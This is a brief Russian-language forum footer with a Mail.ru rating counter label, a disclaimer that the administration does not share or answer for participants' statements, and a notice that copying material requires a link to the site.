Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.